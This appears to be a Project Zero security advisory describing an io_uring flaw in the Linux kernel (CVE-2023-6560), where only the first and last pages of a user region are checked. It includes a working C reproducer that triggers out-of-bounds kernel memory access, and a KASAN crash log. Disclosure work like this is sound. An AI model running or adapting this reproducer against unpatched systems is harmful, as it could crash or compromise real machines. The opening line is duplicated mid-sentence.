io_uring: __io_uaddr_map() handles multi-page region dangerously

__io_uaddr_map() wants to import a region from userspace, and then address the
imported region through the linear mappi io_uring: __io_uaddr_map() handles multi-page region dangerously

__io_uaddr_map() wants to import a region from userspace, and then address the
imported region through the linear mapping area. This requires that the
imported region is physically contiguous.
A comment in __io_uaddr_map() explains that the imported region is usually
just a single page, in which case that is trivially fine.
However, __io_uaddr_map() also has code intended to permit multi-page regions,
in which case it tries to enforce that the entire region maps to the same
folio (in other words, the same head page):

/*
* Should be a single page. If the ring is small enough that we can
* use a normal page, that is fine. If we need multiple pages, then
* userspace should use a huge page. That's the only way to guarantee
* that we get contigious memory, outside of just being lucky or
* (currently) having low memory fragmentation.
*/
if (page_array[0] != page_array[ret - 1])
goto err;

This code is wrong for (more or less) two reasons:

1. It only checks the first and last page; it doesn't check any of the pages
in between. Userspace can easily create a set of adjacent VMAs such that
the first and last virtual page map to the same physical page, while pages
in between map to entirely unrelated pages.
2. It misunderstands how compound pages are represented in the kernel, and
will always reject the case it is supposed to allow:
`pin_user_pages_fast()` would return a set of adjacent `struct page`
instances that are associated with the same head page / folio; it
wouldn't return the same `struct page *` for every subpage.
Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.

So if this code is presented with a userspace region of the following shape,
containing individual 4K pages:

[page A]
[page B]
[...]
[page A]

then it will accept the region and assume that `page_to_virt(<page A>)`
returns the address of a page as big as the entire region. Accesses to the
first 4KiB of the region would work as intended; but accesses to later parts
of the region will be out-of-bounds accesses to unrelated pages.


Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it
overruns the end of the first sq page:

```
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

#define NUM_SQ_PAGES 4

int main(void) {
int memfd_sq = SYSCHK(memfd_create("", 0));
int memfd_cq = SYSCHK(memfd_create("", 0));
SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));
SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));

// sq
void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));
SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));

// cq (rings)
void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));
*(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;
for (int i=1; i<NUM_SQ_PAGES; i++)
SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));

struct io_uring_params params = {
.flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,
.sq_off = {
.user_addr = (unsigned long)sq_data
},
.cq_off = {
.user_addr = (unsigned long)cq_data
}
};
int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));
printf("uring_fd = %d
", uring_fd);

/* submit nops */
int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));
printf("enter returned %d
", enter_res);
}
```

It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):

```
[ 73.380288] ==================================================================
[ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00
[ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708
[ 73.383967]
[ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357
[ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 73.386778] Call Trace:
[ 73.387177] <TASK>
[ 73.387520] dump_stack_lvl+0x4a/0x80
[ 73.388117] print_report+0xcf/0x670
[...]
[ 73.389595] kasan_report+0xd8/0x110
[...]
[ 73.391954] io_submit_sqes+0x223/0xc00
[ 73.392570] __do_sys_io_uring_enter+0x965/0x1200
[...]
[ 73.397438] do_syscall_64+0x46/0xf0
[ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76
[ 73.398787] RIP: 0033:0x7ff8ed2e7989
[ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48
[ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa
[ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989
[ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005
[ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100
[ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0
[ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000
[ 73.419272] </TASK>
[removed irrelevant alloc/free traces of the accessed memory region]
[ 73.449202]
[ 73.449471] The buggy address belongs to the object at ffff88810263a000
[ 73.449471] which belongs to the cache kmalloc-128 of size 128
[ 73.451228] The buggy address is located 0 bytes inside of
[ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080)
[ 73.453173]
[ 73.453429] The buggy address belongs to the physical page:
[ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a
[ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)
[ 73.457522] page_type: 0xffffffff()
[ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002
[ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[ 73.460305] page dumped because: kasan: bad access detected
[ 73.461091]
[ 73.461353] Memory state around the buggy address:
[ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.463058] ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.465289] ^
[ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
```

I'm not sure about the best way to fix it - since the compound page support
can't actually have worked, as explained above, maybe it's easiest to just
drop support for compound pages? u03bfr alternatively we could fix that, but since
nobody seems to have used it, that'd maybe be unnecessary complexity...


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-22.

Related CVE Numbers: CVE-2023-6560.



Found by: jannh@google.com